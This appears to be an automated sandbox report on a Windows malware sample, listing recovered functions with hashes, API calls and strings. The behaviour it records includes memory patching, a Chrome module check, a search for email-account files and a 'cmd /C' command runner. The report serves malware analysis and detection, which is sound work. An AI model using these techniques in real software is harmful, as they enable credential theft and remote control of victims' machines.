  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
